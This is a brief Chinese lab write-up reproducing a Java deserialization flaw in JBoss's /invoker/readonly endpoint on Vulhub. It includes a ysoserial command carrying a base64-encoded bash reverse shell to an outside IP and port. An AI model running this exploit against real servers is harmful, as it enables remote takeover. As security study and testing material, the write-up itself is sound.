原因
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
参考:
复现
该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:
![](https://img-blog.csdnimg.cn/img_convert/20b93c3e41ab14f8fc9a707460c8e60d.webp?x-oss-process=image/format,png)
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。
编写反弹shell的命令
我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。工具:http://www.jackson-t.ca/runtime-exec-payloads.html
![](https://img-blog.csdnimg.cn/img_convert/a76eddcacea34838bc225601f9aa4230.png)
序列化数据生成
使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzIxNi4xMjcuMTY0LjIzOC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
生成poc文件
在/invoker/readonly上传,成功反弹shell
![](https://img-blog.csdnimg.cn/img_convert/64e339cb6b244ec4d9cc394394a9f2b6.png)
![](https://img-blog.csdnimg.cn/img_convert/bbd715904013521e44546b767e9ea386.png)